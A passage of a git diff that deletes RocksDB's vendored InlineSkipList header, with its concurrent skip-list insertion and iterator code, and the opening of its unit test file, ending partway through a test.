-  // Create a new InlineSkipList object that will use "cmp" for comparing
-  // keys, and will allocate memory using "*allocator".  Objects allocated
-  // in the allocator must remain allocated for the lifetime of the
-  // skiplist object.
-  explicit InlineSkipList(Comparator cmp, Allocator* allocator,
-                          int32_t max_height = 12,
-                          int32_t branching_factor = 4);
-
-  // Allocates a key and a skip-list node, returning a pointer to the key
-  // portion of the node.  This method is thread-safe if the allocator
-  // is thread-safe.
-  char* AllocateKey(size_t key_size);
-
-  // Allocate a splice using allocator.
-  Splice* AllocateSplice();
-
-  // Inserts a key allocated by AllocateKey, after the actual key value
-  // has been filled in.
-  //
-  // REQUIRES: nothing that compares equal to key is currently in the list.
-  // REQUIRES: no concurrent calls to any of inserts.
-  void Insert(const char* key);
-
-  // Inserts a key allocated by AllocateKey with a hint of last insert
-  // position in the skip-list. If hint points to nullptr, a new hint will be
-  // populated, which can be used in subsequent calls.
-  //
-  // It can be used to optimize the workload where there are multiple groups
-  // of keys, and each key is likely to insert to a location close to the last
-  // inserted key in the same group. One example is sequential inserts.
-  //
-  // REQUIRES: nothing that compares equal to key is currently in the list.
-  // REQUIRES: no concurrent calls to any of inserts.
-  void InsertWithHint(const char* key, void** hint);
-
-  // Like Insert, but external synchronization is not required.
-  void InsertConcurrently(const char* key);
-
-  // Inserts a node into the skip list.  key must have been allocated by
-  // AllocateKey and then filled in by the caller.  If UseCAS is true,
-  // then external synchronization is not required, otherwise this method
-  // may not be called concurrently with any other insertions.
-  //
-  // Regardless of whether UseCAS is true, the splice must be owned
-  // exclusively by the current thread.  If allow_partial_splice_fix is
-  // true, then the cost of insertion is amortized O(log D), where D is
-  // the distance from the splice to the inserted key (measured as the
-  // number of intervening nodes).  Note that this bound is very good for
-  // sequential insertions!  If allow_partial_splice_fix is false then
-  // the existing splice will be ignored unless the current key is being
-  // inserted immediately after the splice.  allow_partial_splice_fix ==
-  // false has worse running time for the non-sequential case O(log N),
-  // but a better constant factor.
-  template <bool UseCAS>
-  void Insert(const char* key, Splice* splice, bool allow_partial_splice_fix);
-
-  // Returns true iff an entry that compares equal to key is in the list.
-  bool Contains(const char* key) const;
-
-  // Return estimated number of entries smaller than `key`.
-  uint64_t EstimateCount(const char* key) const;
-
-  // Validate correctness of the skip-list.
-  void TEST_Validate() const;
-
-  // Iteration over the contents of a skip list
-  class Iterator {
-   public:
-    // Initialize an iterator over the specified list.
-    // The returned iterator is not valid.
-    explicit Iterator(const InlineSkipList* list);
-
-    // Change the underlying skiplist used for this iterator
-    // This enables us not changing the iterator without deallocating
-    // an old one and then allocating a new one
-    void SetList(const InlineSkipList* list);
-
-    // Returns true iff the iterator is positioned at a valid node.
-    bool Valid() const;
-
-    // Returns the key at the current position.
-    // REQUIRES: Valid()
-    const char* key() const;
-
-    // Advances to the next position.
-    // REQUIRES: Valid()
-    void Next();
-
-    // Advances to the previous position.
-    // REQUIRES: Valid()
-    void Prev();
-
-    // Advance to the first entry with a key >= target
-    void Seek(const char* target);
-
-    // Retreat to the last entry with a key <= target
-    void SeekForPrev(const char* target);
-
-    // Position at the first entry in list.
-    // Final state of iterator is Valid() iff list is not empty.
-    void SeekToFirst();
-
-    // Position at the last entry in list.
-    // Final state of iterator is Valid() iff list is not empty.
-    void SeekToLast();
-
-   private:
-    const InlineSkipList* list_;
-    Node* node_;
-    // Intentionally copyable
-  };
-
- private:
-  const uint16_t kMaxHeight_;
-  const uint16_t kBranching_;
-  const uint32_t kScaledInverseBranching_;
-
-  // Immutable after construction
-  Comparator const compare_;
-  Allocator* const allocator_;  // Allocator used for allocations of nodes
-
-  Node* const head_;
-
-  // Modified only by Insert().  Read racily by readers, but stale
-  // values are ok.
-  std::atomic<int> max_height_;  // Height of the entire list
-
-  // seq_splice_ is a Splice used for insertions in the non-concurrent
-  // case.  It caches the prev and next found during the most recent
-  // non-concurrent insertion.
-  Splice* seq_splice_;
-
-  inline int GetMaxHeight() const {
-    return max_height_.load(std::memory_order_relaxed);
-  }
-
-  int RandomHeight();
-
-  Node* AllocateNode(size_t key_size, int height);
-
-  bool Equal(const char* a, const char* b) const {
-    return (compare_(a, b) == 0);
-  }
-
-  bool LessThan(const char* a, const char* b) const {
-    return (compare_(a, b) < 0);
-  }
-
-  // Return true if key is greater than the data stored in "n".  Null n
-  // is considered infinite.  n should not be head_.
-  bool KeyIsAfterNode(const char* key, Node* n) const;
-
-  // Returns the earliest node with a key >= key.
-  // Return nullptr if there is no such node.
-  Node* FindGreaterOrEqual(const char* key) const;
-
-  // Return the latest node with a key < key.
-  // Return head_ if there is no such node.
-  // Fills prev[level] with pointer to previous node at "level" for every
-  // level in [0..max_height_-1], if prev is non-null.
-  Node* FindLessThan(const char* key, Node** prev = nullptr) const;
-
-  // Return the latest node with a key < key on bottom_level. Start searching
-  // from root node on the level below top_level.
-  // Fills prev[level] with pointer to previous node at "level" for every
-  // level in [bottom_level..top_level-1], if prev is non-null.
-  Node* FindLessThan(const char* key, Node** prev, Node* root, int top_level,
-                     int bottom_level) const;
-
-  // Return the last node in the list.
-  // Return head_ if list is empty.
-  Node* FindLast() const;
-
-  // Traverses a single level of the list, setting *out_prev to the last
-  // node before the key and *out_next to the first node after. Assumes
-  // that the key is not present in the skip list. On entry, before should
-  // point to a node that is before the key, and after should point to
-  // a node that is after the key.  after should be nullptr if a good after
-  // node isn't conveniently available.
-  void FindSpliceForLevel(const char* key, Node* before, Node* after, int level,
-                          Node** out_prev, Node** out_next);
-
-  // Recomputes Splice levels from highest_level (inclusive) down to
-  // lowest_level (inclusive).
-  void RecomputeSpliceLevels(const char* key, Splice* splice,
-                             int recompute_level);
-
-  // No copying allowed
-  InlineSkipList(const InlineSkipList&);
-  InlineSkipList& operator=(const InlineSkipList&);
-};
-
-// Implementation details follow
-
-template <class Comparator>
-struct InlineSkipList<Comparator>::Splice {
-  // The invariant of a Splice is that prev_[i+1].key <= prev_[i].key <
-  // next_[i].key <= next_[i+1].key for all i.  That means that if a
-  // key is bracketed by prev_[i] and next_[i] then it is bracketed by
-  // all higher levels.  It is _not_ required that prev_[i]->Next(i) ==
-  // next_[i] (it probably did at some point in the past, but intervening
-  // or concurrent operations might have inserted nodes in between).
-  int height_ = 0;
-  Node** prev_;
-  Node** next_;
-};
-
-// The Node data type is more of a pointer into custom-managed memory than
-// a traditional C++ struct.  The key is stored in the bytes immediately
-// after the struct, and the next_ pointers for nodes with height > 1 are
-// stored immediately _before_ the struct.  This avoids the need to include
-// any pointer or sizing data, which reduces per-node memory overheads.
-template <class Comparator>
-struct InlineSkipList<Comparator>::Node {
-  // Stores the height of the node in the memory location normally used for
-  // next_[0].  This is used for passing data from AllocateKey to Insert.
-  void StashHeight(const int height) {
-    assert(sizeof(int) <= sizeof(next_[0]));
-    memcpy(&next_[0], &height, sizeof(int));
-  }
-
-  // Retrieves the value passed to StashHeight.  Undefined after a call
-  // to SetNext or NoBarrier_SetNext.
-  int UnstashHeight() const {
-    int rv;
-    memcpy(&rv, &next_[0], sizeof(int));
-    return rv;
-  }
-
-  const char* Key() const { return reinterpret_cast<const char*>(&next_[1]); }
-
-  // Accessors/mutators for links.  Wrapped in methods so we can add
-  // the appropriate barriers as necessary, and perform the necessary
-  // addressing trickery for storing links below the Node in memory.
-  Node* Next(int n) {
-    assert(n >= 0);
-    // Use an 'acquire load' so that we observe a fully initialized
-    // version of the returned Node.
-    return (next_[-n].load(std::memory_order_acquire));
-  }
-
-  void SetNext(int n, Node* x) {
-    assert(n >= 0);
-    // Use a 'release store' so that anybody who reads through this
-    // pointer observes a fully initialized version of the inserted node.
-    next_[-n].store(x, std::memory_order_release);
-  }
-
-  bool CASNext(int n, Node* expected, Node* x) {
-    assert(n >= 0);
-    return next_[-n].compare_exchange_strong(expected, x);
-  }
-
-  // No-barrier variants that can be safely used in a few locations.
-  Node* NoBarrier_Next(int n) {
-    assert(n >= 0);
-    return next_[-n].load(std::memory_order_relaxed);
-  }
-
-  void NoBarrier_SetNext(int n, Node* x) {
-    assert(n >= 0);
-    next_[-n].store(x, std::memory_order_relaxed);
-  }
-
-  // Insert node after prev on specific level.
-  void InsertAfter(Node* prev, int level) {
-    // NoBarrier_SetNext() suffices since we will add a barrier when
-    // we publish a pointer to "this" in prev.
-    NoBarrier_SetNext(level, prev->NoBarrier_Next(level));
-    prev->SetNext(level, this);
-  }
-
- private:
-  // next_[0] is the lowest level link (level 0).  Higher levels are
-  // stored _earlier_, so level 1 is at next_[-1].
-  std::atomic<Node*> next_[1];
-};
-
-template <class Comparator>
-inline InlineSkipList<Comparator>::Iterator::Iterator(
-    const InlineSkipList* list) {
-  SetList(list);
-}
-
-template <class Comparator>
-inline void InlineSkipList<Comparator>::Iterator::SetList(
-    const InlineSkipList* list) {
-  list_ = list;
-  node_ = nullptr;
-}
-
-template <class Comparator>
-inline bool InlineSkipList<Comparator>::Iterator::Valid() const {
-  return node_ != nullptr;
-}
-
-template <class Comparator>
-inline const char* InlineSkipList<Comparator>::Iterator::key() const {
-  assert(Valid());
-  return node_->Key();
-}
-
-template <class Comparator>
-inline void InlineSkipList<Comparator>::Iterator::Next() {
-  assert(Valid());
-  node_ = node_->Next(0);
-}
-
-template <class Comparator>
-inline void InlineSkipList<Comparator>::Iterator::Prev() {
-  // Instead of using explicit "prev" links, we just search for the
-  // last node that falls before key.
-  assert(Valid());
-  node_ = list_->FindLessThan(node_->Key());
-  if (node_ == list_->head_) {
-    node_ = nullptr;
-  }
-}
-
-template <class Comparator>
-inline void InlineSkipList<Comparator>::Iterator::Seek(const char* target) {
-  node_ = list_->FindGreaterOrEqual(target);
-}
-
-template <class Comparator>
-inline void InlineSkipList<Comparator>::Iterator::SeekForPrev(
-    const char* target) {
-  Seek(target);
-  if (!Valid()) {
-    SeekToLast();
-  }
-  while (Valid() && list_->LessThan(target, key())) {
-    Prev();
-  }
-}
-
-template <class Comparator>
-inline void InlineSkipList<Comparator>::Iterator::SeekToFirst() {
-  node_ = list_->head_->Next(0);
-}
-
-template <class Comparator>
-inline void InlineSkipList<Comparator>::Iterator::SeekToLast() {
-  node_ = list_->FindLast();
-  if (node_ == list_->head_) {
-    node_ = nullptr;
-  }
-}
-
-template <class Comparator>
-int InlineSkipList<Comparator>::RandomHeight() {
-  auto rnd = Random::GetTLSInstance();
-
-  // Increase height with probability 1 in kBranching
-  int height = 1;
-  while (height < kMaxHeight_ && height < kMaxPossibleHeight &&
-         rnd->Next() < kScaledInverseBranching_) {
-    height++;
-  }
-  assert(height > 0);
-  assert(height <= kMaxHeight_);
-  assert(height <= kMaxPossibleHeight);
-  return height;
-}
-
-template <class Comparator>
-bool InlineSkipList<Comparator>::KeyIsAfterNode(const char* key,
-                                                Node* n) const {
-  // nullptr n is considered infinite
-  assert(n != head_);
-  return (n != nullptr) && (compare_(n->Key(), key) < 0);
-}
-
-template <class Comparator>
-typename InlineSkipList<Comparator>::Node*
-InlineSkipList<Comparator>::FindGreaterOrEqual(const char* key) const {
-  // Note: It looks like we could reduce duplication by implementing
-  // this function as FindLessThan(key)->Next(0), but we wouldn't be able
-  // to exit early on equality and the result wouldn't even be correct.
-  // A concurrent insert might occur after FindLessThan(key) but before
-  // we get a chance to call Next(0).
-  Node* x = head_;
-  int level = GetMaxHeight() - 1;
-  Node* last_bigger = nullptr;
-  while (true) {
-    Node* next = x->Next(level);
-    // Make sure the lists are sorted
-    assert(x == head_ || next == nullptr || KeyIsAfterNode(next->Key(), x));
-    // Make sure we haven't overshot during our search
-    assert(x == head_ || KeyIsAfterNode(key, x));
-    int cmp = (next == nullptr || next == last_bigger)
-                  ? 1
-                  : compare_(next->Key(), key);
-    if (cmp == 0 || (cmp > 0 && level == 0)) {
-      return next;
-    } else if (cmp < 0) {
-      // Keep searching in this list
-      x = next;
-    } else {
-      // Switch to next list, reuse compare_() result
-      last_bigger = next;
-      level--;
-    }
-  }
-}
-
-template <class Comparator>
-typename InlineSkipList<Comparator>::Node*
-InlineSkipList<Comparator>::FindLessThan(const char* key, Node** prev) const {
-  return FindLessThan(key, prev, head_, GetMaxHeight(), 0);
-}
-
-template <class Comparator>
-typename InlineSkipList<Comparator>::Node*
-InlineSkipList<Comparator>::FindLessThan(const char* key, Node** prev,
-                                         Node* root, int top_level,
-                                         int bottom_level) const {
-  assert(top_level > bottom_level);
-  int level = top_level - 1;
-  Node* x = root;
-  // KeyIsAfter(key, last_not_after) is definitely false
-  Node* last_not_after = nullptr;
-  while (true) {
-    Node* next = x->Next(level);
-    assert(x == head_ || next == nullptr || KeyIsAfterNode(next->Key(), x));
-    assert(x == head_ || KeyIsAfterNode(key, x));
-    if (next != last_not_after && KeyIsAfterNode(key, next)) {
-      // Keep searching in this list
-      x = next;
-    } else {
-      if (prev != nullptr) {
-        prev[level] = x;
-      }
-      if (level == bottom_level) {
-        return x;
-      } else {
-        // Switch to next list, reuse KeyIsAfterNode() result
-        last_not_after = next;
-        level--;
-      }
-    }
-  }
-}
-
-template <class Comparator>
-typename InlineSkipList<Comparator>::Node*
-InlineSkipList<Comparator>::FindLast() const {
-  Node* x = head_;
-  int level = GetMaxHeight() - 1;
-  while (true) {
-    Node* next = x->Next(level);
-    if (next == nullptr) {
-      if (level == 0) {
-        return x;
-      } else {
-        // Switch to next list
-        level--;
-      }
-    } else {
-      x = next;
-    }
-  }
-}
-
-template <class Comparator>
-uint64_t InlineSkipList<Comparator>::EstimateCount(const char* key) const {
-  uint64_t count = 0;
-
-  Node* x = head_;
-  int level = GetMaxHeight() - 1;
-  while (true) {
-    assert(x == head_ || compare_(x->Key(), key) < 0);
-    Node* next = x->Next(level);
-    if (next == nullptr || compare_(next->Key(), key) >= 0) {
-      if (level == 0) {
-        return count;
-      } else {
-        // Switch to next list
-        count *= kBranching_;
-        level--;
-      }
-    } else {
-      x = next;
-      count++;
-    }
-  }
-}
-
-template <class Comparator>
-InlineSkipList<Comparator>::InlineSkipList(const Comparator cmp,
-                                           Allocator* allocator,
-                                           int32_t max_height,
-                                           int32_t branching_factor)
-    : kMaxHeight_(max_height),
-      kBranching_(branching_factor),
-      kScaledInverseBranching_((Random::kMaxNext + 1) / kBranching_),
-      compare_(cmp),
-      allocator_(allocator),
-      head_(AllocateNode(0, max_height)),
-      max_height_(1),
-      seq_splice_(AllocateSplice()) {
-  assert(max_height > 0 && kMaxHeight_ == static_cast<uint32_t>(max_height));
-  assert(branching_factor > 1 &&
-         kBranching_ == static_cast<uint32_t>(branching_factor));
-  assert(kScaledInverseBranching_ > 0);
-
-  for (int i = 0; i < kMaxHeight_; ++i) {
-    head_->SetNext(i, nullptr);
-  }
-}
-
-template <class Comparator>
-char* InlineSkipList<Comparator>::AllocateKey(size_t key_size) {
-  return const_cast<char*>(AllocateNode(key_size, RandomHeight())->Key());
-}
-
-template <class Comparator>
-typename InlineSkipList<Comparator>::Node*
-InlineSkipList<Comparator>::AllocateNode(size_t key_size, int height) {
-  auto prefix = sizeof(std::atomic<Node*>) * (height - 1);
-
-  // prefix is space for the height - 1 pointers that we store before
-  // the Node instance (next_[-(height - 1) .. -1]).  Node starts at
-  // raw + prefix, and holds the bottom-mode (level 0) skip list pointer
-  // next_[0].  key_size is the bytes for the key, which comes just after
-  // the Node.
-  char* raw = allocator_->AllocateAligned(prefix + sizeof(Node) + key_size);
-  Node* x = reinterpret_cast<Node*>(raw + prefix);
-
-  // Once we've linked the node into the skip list we don't actually need
-  // to know its height, because we can implicitly use the fact that we
-  // traversed into a node at level h to known that h is a valid level
-  // for that node.  We need to convey the height to the Insert step,
-  // however, so that it can perform the proper links.  Since we're not
-  // using the pointers at the moment, StashHeight temporarily borrow
-  // storage from next_[0] for that purpose.
-  x->StashHeight(height);
-  return x;
-}
-
-template <class Comparator>
-typename InlineSkipList<Comparator>::Splice*
-InlineSkipList<Comparator>::AllocateSplice() {
-  // size of prev_ and next_
-  size_t array_size = sizeof(Node*) * (kMaxHeight_ + 1);
-  char* raw = allocator_->AllocateAligned(sizeof(Splice) + array_size * 2);
-  Splice* splice = reinterpret_cast<Splice*>(raw);
-  splice->height_ = 0;
-  splice->prev_ = reinterpret_cast<Node**>(raw + sizeof(Splice));
-  splice->next_ = reinterpret_cast<Node**>(raw + sizeof(Splice) + array_size);
-  return splice;
-}
-
-template <class Comparator>
-void InlineSkipList<Comparator>::Insert(const char* key) {
-  Insert<false>(key, seq_splice_, false);
-}
-
-template <class Comparator>
-void InlineSkipList<Comparator>::InsertConcurrently(const char* key) {
-  Node* prev[kMaxPossibleHeight];
-  Node* next[kMaxPossibleHeight];
-  Splice splice;
-  splice.prev_ = prev;
-  splice.next_ = next;
-  Insert<true>(key, &splice, false);
-}
-
-template <class Comparator>
-void InlineSkipList<Comparator>::InsertWithHint(const char* key, void** hint) {
-  assert(hint != nullptr);
-  Splice* splice = reinterpret_cast<Splice*>(*hint);
-  if (splice == nullptr) {
-    splice = AllocateSplice();
-    *hint = reinterpret_cast<void*>(splice);
-  }
-  Insert<false>(key, splice, true);
-}
-
-template <class Comparator>
-void InlineSkipList<Comparator>::FindSpliceForLevel(const char* key,
-                                                    Node* before, Node* after,
-                                                    int level, Node** out_prev,
-                                                    Node** out_next) {
-  while (true) {
-    Node* next = before->Next(level);
-    assert(before == head_ || next == nullptr ||
-           KeyIsAfterNode(next->Key(), before));
-    assert(before == head_ || KeyIsAfterNode(key, before));
-    if (next == after || !KeyIsAfterNode(key, next)) {
-      // found it
-      *out_prev = before;
-      *out_next = next;
-      return;
-    }
-    before = next;
-  }
-}
-
-template <class Comparator>
-void InlineSkipList<Comparator>::RecomputeSpliceLevels(const char* key,
-                                                       Splice* splice,
-                                                       int recompute_level) {
-  assert(recompute_level > 0);
-  assert(recompute_level <= splice->height_);
-  for (int i = recompute_level - 1; i >= 0; --i) {
-    FindSpliceForLevel(key, splice->prev_[i + 1], splice->next_[i + 1], i,
-                       &splice->prev_[i], &splice->next_[i]);
-  }
-}
-
-template <class Comparator>
-template <bool UseCAS>
-void InlineSkipList<Comparator>::Insert(const char* key, Splice* splice,
-                                        bool allow_partial_splice_fix) {
-  Node* x = reinterpret_cast<Node*>(const_cast<char*>(key)) - 1;
-  int height = x->UnstashHeight();
-  assert(height >= 1 && height <= kMaxHeight_);
-
-  int max_height = max_height_.load(std::memory_order_relaxed);
-  while (height > max_height) {
-    if (max_height_.compare_exchange_weak(max_height, height)) {
-      // successfully updated it
-      max_height = height;
-      break;
-    }
-    // else retry, possibly exiting the loop because somebody else
-    // increased it
-  }
-  assert(max_height <= kMaxPossibleHeight);
-
-  int recompute_height = 0;
-  if (splice->height_ < max_height) {
-    // Either splice has never been used or max_height has grown since
-    // last use.  We could potentially fix it in the latter case, but
-    // that is tricky.
-    splice->prev_[max_height] = head_;
-    splice->next_[max_height] = nullptr;
-    splice->height_ = max_height;
-    recompute_height = max_height;
-  } else {
-    // Splice is a valid proper-height splice that brackets some
-    // key, but does it bracket this one?  We need to validate it and
-    // recompute a portion of the splice (levels 0..recompute_height-1)
-    // that is a superset of all levels that don't bracket the new key.
-    // Several choices are reasonable, because we have to balance the work
-    // saved against the extra comparisons required to validate the Splice.
-    //
-    // One strategy is just to recompute all of orig_splice_height if the
-    // bottom level isn't bracketing.  This pessimistically assumes that
-    // we will either get a perfect Splice hit (increasing sequential
-    // inserts) or have no locality.
-    //
-    // Another strategy is to walk up the Splice's levels until we find
-    // a level that brackets the key.  This strategy lets the Splice
-    // hint help for other cases: it turns insertion from O(log N) into
-    // O(log D), where D is the number of nodes in between the key that
-    // produced the Splice and the current insert (insertion is aided
-    // whether the new key is before or after the splice).  If you have
-    // a way of using a prefix of the key to map directly to the closest
-    // Splice out of O(sqrt(N)) Splices and we make it so that splices
-    // can also be used as hints during read, then we end up with Oshman's
-    // and Shavit's SkipTrie, which has O(log log N) lookup and insertion
-    // (compare to O(log N) for skip list).
-    //
-    // We control the pessimistic strategy with allow_partial_splice_fix.
-    // A good strategy is probably to be pessimistic for seq_splice_,
-    // optimistic if the caller actually went to the work of providing
-    // a Splice.
-    while (recompute_height < max_height) {
-      if (splice->prev_[recompute_height]->Next(recompute_height) !=
-          splice->next_[recompute_height]) {
-        // splice isn't tight at this level, there must have been some inserts
-        // to this
-        // location that didn't update the splice.  We might only be a little
-        // stale, but if
-        // the splice is very stale it would be O(N) to fix it.  We haven't used
-        // up any of
-        // our budget of comparisons, so always move up even if we are
-        // pessimistic about
-        // our chances of success.
-        ++recompute_height;
-      } else if (splice->prev_[recompute_height] != head_ &&
-                 !KeyIsAfterNode(key, splice->prev_[recompute_height])) {
-        // key is from before splice
-        if (allow_partial_splice_fix) {
-          // skip all levels with the same node without more comparisons
-          Node* bad = splice->prev_[recompute_height];
-          while (splice->prev_[recompute_height] == bad) {
-            ++recompute_height;
-          }
-        } else {
-          // we're pessimistic, recompute everything
-          recompute_height = max_height;
-        }
-      } else if (KeyIsAfterNode(key, splice->next_[recompute_height])) {
-        // key is from after splice
-        if (allow_partial_splice_fix) {
-          Node* bad = splice->next_[recompute_height];
-          while (splice->next_[recompute_height] == bad) {
-            ++recompute_height;
-          }
-        } else {
-          recompute_height = max_height;
-        }
-      } else {
-        // this level brackets the key, we won!
-        break;
-      }
-    }
-  }
-  assert(recompute_height <= max_height);
-  if (recompute_height > 0) {
-    RecomputeSpliceLevels(key, splice, recompute_height);
-  }
-
-  bool splice_is_valid = true;
-  if (UseCAS) {
-    for (int i = 0; i < height; ++i) {
-      while (true) {
-        assert(splice->next_[i] == nullptr ||
-               compare_(x->Key(), splice->next_[i]->Key()) < 0);
-        assert(splice->prev_[i] == head_ ||
-               compare_(splice->prev_[i]->Key(), x->Key()) < 0);
-        x->NoBarrier_SetNext(i, splice->next_[i]);
-        if (splice->prev_[i]->CASNext(i, splice->next_[i], x)) {
-          // success
-          break;
-        }
-        // CAS failed, we need to recompute prev and next. It is unlikely
-        // to be helpful to try to use a different level as we redo the
-        // search, because it should be unlikely that lots of nodes have
-        // been inserted between prev[i] and next[i]. No point in using
-        // next[i] as the after hint, because we know it is stale.
-        FindSpliceForLevel(key, splice->prev_[i], nullptr, i, &splice->prev_[i],
-                           &splice->next_[i]);
-
-        // Since we've narrowed the bracket for level i, we might have
-        // violated the Splice constraint between i and i-1.  Make sure
-        // we recompute the whole thing next time.
-        if (i > 0) {
-          splice_is_valid = false;
-        }
-      }
-    }
-  } else {
-    for (int i = 0; i < height; ++i) {
-      if (i >= recompute_height &&
-          splice->prev_[i]->Next(i) != splice->next_[i]) {
-        FindSpliceForLevel(key, splice->prev_[i], nullptr, i, &splice->prev_[i],
-                           &splice->next_[i]);
-      }
-      assert(splice->next_[i] == nullptr ||
-             compare_(x->Key(), splice->next_[i]->Key()) < 0);
-      assert(splice->prev_[i] == head_ ||
-             compare_(splice->prev_[i]->Key(), x->Key()) < 0);
-      assert(splice->prev_[i]->Next(i) == splice->next_[i]);
-      x->NoBarrier_SetNext(i, splice->next_[i]);
-      splice->prev_[i]->SetNext(i, x);
-    }
-  }
-  if (splice_is_valid) {
-    for (int i = 0; i < height; ++i) {
-      splice->prev_[i] = x;
-    }
-    assert(splice->prev_[splice->height_] == head_);
-    assert(splice->next_[splice->height_] == nullptr);
-    for (int i = 0; i < splice->height_; ++i) {
-      assert(splice->next_[i] == nullptr ||
-             compare_(key, splice->next_[i]->Key()) < 0);
-      assert(splice->prev_[i] == head_ ||
-             compare_(splice->prev_[i]->Key(), key) <= 0);
-      assert(splice->prev_[i + 1] == splice->prev_[i] ||
-             splice->prev_[i + 1] == head_ ||
-             compare_(splice->prev_[i + 1]->Key(), splice->prev_[i]->Key()) <
-                 0);
-      assert(splice->next_[i + 1] == splice->next_[i] ||
-             splice->next_[i + 1] == nullptr ||
-             compare_(splice->next_[i]->Key(), splice->next_[i + 1]->Key()) <
-                 0);
-    }
-  } else {
-    splice->height_ = 0;
-  }
-}
-
-template <class Comparator>
-bool InlineSkipList<Comparator>::Contains(const char* key) const {
-  Node* x = FindGreaterOrEqual(key);
-  if (x != nullptr && Equal(key, x->Key())) {
-    return true;
-  } else {
-    return false;
-  }
-}
-
-template <class Comparator>
-void InlineSkipList<Comparator>::TEST_Validate() const {
-  // Interate over all levels at the same time, and verify nodes appear in
-  // the right order, and nodes appear in upper level also appear in lower
-  // levels.
-  Node* nodes[kMaxPossibleHeight];
-  int max_height = GetMaxHeight();
-  for (int i = 0; i < max_height; i++) {
-    nodes[i] = head_;
-  }
-  while (nodes[0] != nullptr) {
-    Node* l0_next = nodes[0]->Next(0);
-    if (l0_next == nullptr) {
-      break;
-    }
-    assert(nodes[0] == head_ || compare_(nodes[0]->Key(), l0_next->Key()) < 0);
-    nodes[0] = l0_next;
-
-    int i = 1;
-    while (i < max_height) {
-      Node* next = nodes[i]->Next(i);
-      if (next == nullptr) {
-        break;
-      }
-      auto cmp = compare_(nodes[0]->Key(), next->Key());
-      assert(cmp <= 0);
-      if (cmp == 0) {
-        assert(next == nodes[0]);
-        nodes[i] = next;
-      } else {
-        break;
-      }
-      i++;
-    }
-  }
-  for (int i = 1; i < max_height; i++) {
-    assert(nodes[i]->Next(i) == nullptr);
-  }
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/memtable/inlineskiplist_test.cc b/thirdparty/rocksdb/memtable/inlineskiplist_test.cc
deleted file mode 100644
index 5803e5b..0000000
--- a/thirdparty/rocksdb/memtable/inlineskiplist_test.cc
+++ /dev/null
@@ -1,626 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "memtable/inlineskiplist.h"
-#include <set>
-#include <unordered_set>
-#include "rocksdb/env.h"
-#include "util/concurrent_arena.h"
-#include "util/hash.h"
-#include "util/random.h"
-#include "util/testharness.h"
-
-namespace rocksdb {
-
-// Our test skip list stores 8-byte unsigned integers
-typedef uint64_t Key;
-
-static const char* Encode(const uint64_t* key) {
-  return reinterpret_cast<const char*>(key);
-}
-
-static Key Decode(const char* key) {
-  Key rv;
-  memcpy(&rv, key, sizeof(Key));
-  return rv;
-}
-
-struct TestComparator {
-  int operator()(const char* a, const char* b) const {
-    if (Decode(a) < Decode(b)) {
-      return -1;
-    } else if (Decode(a) > Decode(b)) {
-      return +1;
-    } else {
-      return 0;
-    }
-  }
-};
-
-typedef InlineSkipList<TestComparator> TestInlineSkipList;
-
-class InlineSkipTest : public testing::Test {
- public:
-  void Insert(TestInlineSkipList* list, Key key) {
-    char* buf = list->AllocateKey(sizeof(Key));
-    memcpy(buf, &key, sizeof(Key));
-    list->Insert(buf);
-    keys_.insert(key);
-  }
-
-  void InsertWithHint(TestInlineSkipList* list, Key key, void** hint) {
-    char* buf = list->AllocateKey(sizeof(Key));
-    memcpy(buf, &key, sizeof(Key));
-    list->InsertWithHint(buf, hint);
-    keys_.insert(key);
-  }
-
-  void Validate(TestInlineSkipList* list) {
-    // Check keys exist.
-    for (Key key : keys_) {
-      ASSERT_TRUE(list->Contains(Encode(&key)));
-    }
-    // Iterate over the list, make sure keys appears in order and no extra
-    // keys exist.
-    TestInlineSkipList::Iterator iter(list);
-    ASSERT_FALSE(iter.Valid());
-    Key zero = 0;
-    iter.Seek(Encode(&zero));
-    for (Key key : keys_) {
-      ASSERT_TRUE(iter.Valid());
-      ASSERT_EQ(key, Decode(iter.key()));
-      iter.Next();
-    }
-    ASSERT_FALSE(iter.Valid());
-    // Validate the list is well-formed.
-    list->TEST_Validate();
-  }
-
- private:
-  std::set<Key> keys_;
-};
-
-TEST_F(InlineSkipTest, Empty) {
-  Arena arena;
-  TestComparator cmp;
-  InlineSkipList<TestComparator> list(cmp, &arena);
-  Key key = 10;
-  ASSERT_TRUE(!list.Contains(Encode(&key)));
-
-  InlineSkipList<TestComparator>::Iterator iter(&list);
-  ASSERT_TRUE(!iter.Valid());
-  iter.SeekToFirst();
-  ASSERT_TRUE(!iter.Valid());
-  key = 100;
-  iter.Seek(Encode(&key));
-  ASSERT_TRUE(!iter.Valid());
-  iter.SeekForPrev(Encode(&key));
-  ASSERT_TRUE(!iter.Valid());
-  iter.SeekToLast();
-  ASSERT_TRUE(!iter.Valid());
-}
-
-TEST_F(InlineSkipTest, InsertAndLookup) {
-  const int N = 2000;
-  const int R = 5000;
-  Random rnd(1000);
-  std::set<Key> keys;
-  ConcurrentArena arena;
-  TestComparator cmp;
-  InlineSkipList<TestComparator> list(cmp, &arena);
-  for (int i = 0; i < N; i++) {
-    Key key = rnd.Next() % R;
-    if (keys.insert(key).second) {
-      char* buf = list.AllocateKey(sizeof(Key));
-      memcpy(buf, &key, sizeof(Key));
-      list.Insert(buf);
-    }
-  }
-
-  for (Key i = 0; i < R; i++) {
-    if (list.Contains(Encode(&i))) {
-      ASSERT_EQ(keys.count(i), 1U);
-    } else {
-      ASSERT_EQ(keys.count(i), 0U);
-    }
-  }
-
-  // Simple iterator tests
-  {
-    InlineSkipList<TestComparator>::Iterator iter(&list);
-    ASSERT_TRUE(!iter.Valid());
-
-    uint64_t zero = 0;
-    iter.Seek(Encode(&zero));
-    ASSERT_TRUE(iter.Valid());
-    ASSERT_EQ(*(keys.begin()), Decode(iter.key()));
-
-    uint64_t max_key = R - 1;
-    iter.SeekForPrev(Encode(&max_key));
-    ASSERT_TRUE(iter.Valid());
-    ASSERT_EQ(*(keys.rbegin()), Decode(iter.key()));
-
-    iter.SeekToFirst();
-    ASSERT_TRUE(iter.Valid());
-    ASSERT_EQ(*(keys.begin()), Decode(iter.key()));
-
-    iter.SeekToLast();
